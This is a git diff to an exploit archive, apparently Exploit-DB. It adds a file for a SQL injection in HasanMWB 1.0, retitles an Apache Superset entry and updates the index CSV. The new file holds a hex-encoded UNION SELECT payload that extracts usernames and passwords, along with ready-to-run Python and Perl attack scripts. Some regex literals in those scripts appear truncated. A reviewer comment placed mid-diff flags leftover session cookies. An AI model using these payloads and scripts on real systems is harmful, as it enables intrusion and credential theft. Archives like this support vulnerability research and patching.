diff --git a/exploits/linux/webapps/45933.py b/exploits/linux/webapps/45933.py
index 5e9571e0b..4fdfdbc0b 100755
--- a/exploits/linux/webapps/45933.py
+++ b/exploits/linux/webapps/45933.py
@@ -1,4 +1,4 @@
-# Exploit Title: Apache Superset 0.23 - Remote Code Execution
+# Exploit Title: Apache Superset < 0.23 - Remote Code Execution
 # Date: 2018-05-17
 # Exploit Author: David May (david.may@semanticbits.com)
 # Vendor Homepage: https://superset.apache.org/
diff --git a/exploits/php/webapps/45955.txt b/exploits/php/webapps/45955.txt
new file mode 100644
index 000000000..c31967927
--- /dev/null
+++ b/exploits/php/webapps/45955.txt
@@ -0,0 +1,100 @@
+# Exploit Title: HasanMWB 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2018-12-05
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://sourceforge.net/projects/hasanmwb/
+# Software Link: https://netcologne.dl.sourceforge.net/project/hasanmwb/HasanMWB-v1.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+#GET /PATH/index.php?hsn=category&id=1%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%30%78%33%63%36%38%33%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%32%30%32%30%2c%30%78%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%32%66%36%38%33%32%33%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%75%73%65%72%29%2c%33%2c%34%2d%2d%20%2d HTTP/1.1
+#Host: TARGET
+#User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+#Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+#Accept-Language: en-US,en;q=0.5
+#Accept-Encoding: gzip, deflate
+#Cookie: PHPSESSID=5lk3medj631el6lb4e77ereee5; 786e332ae62061df5c64a17076aef3ee=0li10seku22m9qr31rr8avemn2
+#DNT: 1
+#Connection: keep-alive
+#Upgrade-Insecure-Requests: 1
+#HTTP/1.1 200 OK
+#Date: Wed, 05 Dec 2018 00:24:09 GMT
+#Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+#X-Powered-By: PHP/5.6.30
+#Expires: Thu, 19 Nov 1981 08:52:00 GMT
+#Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+#Pragma: no-cache
+#Content-Length: 2697
+#Keep-Alive: timeout=5, max=100
+#Connection: Keep-Alive
+#Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 1)
+#index.php?hsn=page&id=[SQL] / $id = $_GET['id'];
+#index.php?hsn=category&id=[SQL] / $id = $_GET['id'];
+#index.php?hsn=search&q=[SQL] / $qu = $_GET['q'];
+# Etc..
+
+#!/usr/bin/python
+import urllib2
+import re
+
+print """
+ \\\|///
+ \\ - - //
+ ( @ @ )
+ ----oOOo--(_)-oOOo----
+HasanMWB 1.0 - SQL Injection
+ Ihsan Sencan
+ ---------------Ooooo----
+ ( )
+ ooooO ) /
+ ( ) (_/
+ \ (
+ \_)
+"""
+
+s = raw_input("\nTarget:[http://localhost/[PATH]/] ")
+e = ("index.php?hsn=category&id=1")
+p = ("%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%30%78%33%63%36%38%33%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%32%30%32%30%2c%30%78%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%32%66%36%38%33%32%33%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%75%73%65%72%29%2c%33%2c%34%2d%2d%20%2d")
+response = urllib2.urlopen(s+e+p)
+c = response.read()
+up = re.findall(r'

(.*)

', c)
+
+print "Server: ", response.info()['server']
+print (up)
+print "Login Url:"+(s)+"panel.php"
+
+
+#!/usr/bin/perl
+sub clear{
+system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
+clear();
+
+print "**************************\n";
+print "HasanMWB 1.0 SQL Injection\n";
+print "Ihsan Sencan\n";
+print "**************************\n";
+
+use LWP::UserAgent;
+print "\nTarget:[http://localhost/[PATH]/] ";
+chomp(my $target=);
+print "\n[!] Exploiting Progress...\n";
+print "\n";
+
+$E="/index.php?hsn=category&id=%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%30%78%33%63%36%38%33%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%32%30%32%30%2c%30%78%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%32%66%36%38%33%32%33%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%75%73%65%72%29%2c%33%2c%34%2d%2d%20%2d";
+$cc = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$cc->agent('Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0');
+$host = $target . "".$E."";
+$res = $cc->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content; if ($answer =~/

(.*?)<\/h2>/){
+print "[+] Success !!!\n";
+print "\n[+] Detail : $1\n";
+print "$target/panel.php";
+print "\n";
+}
+else{print "\n[-]Not found.\n";
+}
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 013bfdae5..015cb11be 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10126,7 +10126,7 @@ id,file,description,date,author,type,platform,port
 45867,exploits/multiple/local/45867.txt,"Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple,
 45886,exploits/linux/local/45886.txt,"Linux - Broken uid/gid Mapping for Nested User Namespaces",2018-11-16,"Google Security Research",local,linux,
 45888,exploits/windows_x86/local/45888.py,"HTML Video Player 1.2.5 - Buffer-Overflow (SEH)",2018-11-19,"Kağan Çapar",local,windows_x86,
-45890,exploits/multiple/local/45890.sh,"ImageMagick - Memory Leak",2018-11-19,barracud4_,local,multiple,
+45890,exploits/multiple/local/45890.sh,"ImageMagick - Memory Leak",2018-11-19,ttffdd,local,multiple,
 45893,exploits/windows/local/45893.txt,"Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation",2018-11-20,"Google Security Research",local,windows,
 45907,exploits/windows_x86/local/45907.txt,"Arm Whois 3.11 - Buffer Overflow (ASLR)",2018-11-26,zephyr,local,windows_x86,
 45908,exploits/multiple/local/45908.rb,"Xorg X11 Server - SUID privilege escalation (Metasploit)",2018-11-26,Metasploit,local,multiple,
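Review bot: The captured request in the header block of the new 45955.txt still carries live session identifiers — `#Cookie: PHPSESSID=5lk3medj631el6lb4e77ereee5; 786e332ae62061df5c64a17076aef3ee=0li10seku22m9qr31rr8avemn2` — even though `#Host: TARGET` was redacted; both cookie values should be scrubbed to `[REDACTED]` before the advisory is published, since the trace is otherwise reproduced verbatim. The `# POC:` section names the vulnerable sinks (`$id = $_GET['id'];`, `$qu = $_GET['q'];`) but gives a maintainer or defender nothing to act on; a line such as `# Remediation: validate id as an integer and pass q as a bound parameter instead of concatenating $_GET values into SQL` would make the entry useful for patching as well as verification. As rendered here the regex literals in `re.findall(r'` … `', c)` and the Perl `chomp(my $target=);` look truncated, most likely markup stripped on display rather than in the commit, so the scripts' response parsing cannot be checked from this view.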
@@ -40441,8 +40441,8 @@ id,file,description,date,author,type,platform,port
 45929,exploits/linux/webapps/45929.py,"PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure",2018-12-03,ParagonSec,webapps,linux,80
 45930,exploits/php/webapps/45930.pl,"Joomla! Component JE Photo Gallery 1.1 - 'categoryid' SQL Injection",2018-12-03,"Ihsan Sencan",webapps,php,80
 45932,exploits/php/webapps/45932.txt,"PHP Server Monitor 3.3.1 - Cross-Site Request Forgery",2018-12-03,"Javier Olmedo",webapps,php,80
-45933,exploits/linux/webapps/45933.py,"Apache Superset 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux,
-45935,exploits/php/webapps/45935.txt,"Wordpress Plugins Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting",2018-12-03,"Loading Kura Kura",webapps,php,80
+45933,exploits/linux/webapps/45933.py,"Apache Superset < 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux,
+45935,exploits/php/webapps/45935.txt,"WordPress Plugin Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting",2018-12-03,"Loading Kura Kura",webapps,php,80
 45937,exploits/hardware/webapps/45937.txt,"Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control Authentication Bypass",2018-12-04,Luca.Chiou,webapps,hardware,80
 45941,exploits/php/webapps/45941.txt,"DomainMOD 4.11.01 - Owner name Field Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
 45942,exploits/hardware/webapps/45942.py,"NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage",2018-12-04,hyp3rlinx,webapps,hardware,
@@ -40453,3 +40453,4 @@ id,file,description,date,author,type,platform,port
 45948,exploits/php/webapps/45948.py,"NUUO NVRMini2 3.9.1 - Authenticated Command Injection",2018-12-04,"Artem Metla",webapps,php,443
 45949,exploits/php/webapps/45949.txt,"DomainMOD 4.11.01 - Registrar Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
 45954,exploits/php/webapps/45954.txt,"FreshRSS 1.11.1 - Cross-Site Scripting",2018-12-04,Netsparker,webapps,php,80
+45955,exploits/php/webapps/45955.txt,"HasanMWB 1.0 - SQL Injection",2018-12-05,"Ihsan Sencan",webapps,php,80